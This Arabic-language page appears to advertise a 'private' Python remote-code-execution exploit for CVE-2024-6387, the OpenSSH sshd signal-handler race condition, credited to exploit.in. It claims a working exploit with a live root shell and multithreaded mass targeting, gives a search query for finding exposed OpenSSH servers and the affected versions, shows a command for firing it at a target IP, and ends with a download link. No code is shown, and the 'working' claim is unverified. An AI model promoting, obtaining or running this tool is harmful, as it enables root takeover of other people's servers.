
استغلال RCE خاص على x64 لـ CVE-2024-6387 [02.07.2024] من exploit.in
استغلال RCE خاص بمعمارية x64 (بايثون) لـ CVE-2024-6387 [02.07.2024] من exploit.in
يوفّر المستودع نسخة عاملة من استغلال ثغرة CVE-2024-6387 مع دعم لصدفة نشطة في الوقت الفعلي، وتعدد الخيوط، وإدخال الأهداف من ملف، وإخراج ملون.
استغلال لـ CVE-2024-6387، يستهدف حالة تسابق في معالج الإشارات في خادم OpenSSH (sshd) على أنظمة لينكس القائمة على glibc. تسمح الثغرة بتنفيذ تعليمات برمجية عن بُعد بصلاحيات الجذر بسبب استدعاء دوال غير آمنة في سياق الإشارات غير المتزامنة في معالج SIGALRM.
يستهدف الاستغلال حالة التسابق في معالج SIGALRM في sshd الخاص بـ OpenSSH، والذي يستدعي دوالًا غير آمنة في سياق الإشارات غير المتزامنة. يمكن استغلال ذلك لتحقيق تنفيذ تعليمات برمجية عن بُعد بصلاحيات الجذر.
app:"OpenSSH"
OpenSSH 8.5p1 إلى 9.8p1
لتشغيل الاستغلال تحتاج إلى Python 3.9. نفّذ:
python exploit.py -h 10.10.10.10 -c 'id'
حمّل من هنا (بشكل آمن!)